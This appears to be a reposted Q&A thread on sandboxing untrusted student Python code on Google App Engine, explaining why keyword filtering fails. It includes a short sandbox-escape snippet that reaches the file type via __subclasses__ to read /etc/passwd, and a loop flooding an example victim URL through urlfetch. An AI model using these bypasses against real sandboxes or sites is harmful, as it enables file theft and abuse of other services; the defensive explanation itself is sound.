What is the best way to limit the risk of running untrusted code in Python on GAE?

I would like to give students the ability to submit Python-based solutions to a few simple Python problems. My application will run on GAE. How can I limit the risk posed by malicious code? I understand this is a complex issue, and I have read the related Stack Overflow and other posts on the subject. I am wondering whether the restrictions already in place in the GAE environment make it easier to limit the damage that untrusted code can cause. Is it enough to scan the submitted code for a few restricted keywords (exec, import, etc.) and then make sure the code only runs for a limited amount of time, or is it still hard to protect against untrusted code even inside the restricted GAE environment? For example:

# Import and execute untrusted code in GAE
untrustedCode = """#Untrusted code from students."""

class TestSpace(object):
    pass

testspace = TestSpace()

try:
    # Check the untrusted code somehow and raise an exception if it is unsafe.
    pass
except:
    print "Code attempted to import or access network"


try:
    # exec code in a new namespace (Thanks Alex Martelli)
    # limit runtime somehow
    exec untrustedCode in vars(testspace)
except:
    print "Code took more than x seconds to run"

As @mjv's smiley comment already hints, there is no simple, safe answer here.

Checking the submitted code for a few restricted keywords is, alas ;-), nowhere near enough: there are plenty of ways to get at __import__ & c. without ever writing exec, eval or import literally, for example via __subclasses__, __bases__, __mro__ and similar introspection attributes. The GAE sandbox does limit what such code can do to the underlying system (no writing to the filesystem, no raw sockets), but that alone does not make the submitted code safe for your app.
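
For instance, a sketch of the kind of bypass meant here (plain CPython 2 introspection; the target file name is only an example):

# None of the "dangerous" words (import, exec, eval, open) appear in the
# submission below, yet it reaches the built-in file type by walking
# __class__ -> __bases__ -> __subclasses__ starting from a plain tuple.
untrustedCode = """
f = [c for c in ().__class__.__bases__[0].__subclasses__()
     if c.__name__ == 'file'][0]
print f('/etc/passwd').read()
"""

banned = ('import', 'exec', 'eval', 'open')
print all(word not in untrustedCode for word in banned)   # prints True

(On App Engine the read itself would fail against the runtime's own restrictions, but the point is that the keyword filter never even notices the attempt.)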

What is more: even on GAE the untrusted code runs as part of your app, with your app's privileges; it could, for example, hammer urlfetch requests at ANOTHER site so that the abuse appears to come from you, or simply burn through your quotas. So there is still real risk here, restricted environment or not...
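
To make that last point concrete, a minimal sketch (the victim URL is made up, and the import is written out literally only for readability; as shown above it does not have to be): whatever you exec runs inside one of your own requests, so it can call App Engine services such as urlfetch with your app's identity.

untrustedCode = """
from google.appengine.api import urlfetch
for _ in range(100):
    urlfetch.fetch('http://victim.example.com/expensive-page')
"""

# The exec'd code runs inside our request handler, so every one of those
# fetches is made by (and counted against the quota of) our application.
exec untrustedCode in {}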


The Python App Engine runtime will not save you here. Alex is right that filtering the source for keywords and then exec'ing whatever is left is not a real defence; the submitted code runs inside your app, with everything your app is allowed to do, constrained only by the limits App Engine puts on the app as a whole.

More generally, sandboxing Python from within Python is a notoriously hard problem. The restricted-execution support that used to ship with Python (rexec and Bastion) was disabled because of known exploits, and Guido has shown little interest in bringing restricted execution back into Python. Do not expect an ad-hoc filter to fare better.

One alternative to consider: use the Java runtime with Rhino (a JavaScript interpreter for Java) to run the submitted code; Rhino supports sandboxing properly. You could also look at Jython; I do not know whether it can be sandboxed as cleanly, but it may be worth investigating.

Regarding Alex's mention of shell.appspot.com: it does run arbitrary Python, but it relies entirely on the App Engine sandbox, the code runs with the app's own privileges, and the app itself has nothing of value to lose.


Source: https://habr.com/ru/post/1718867/

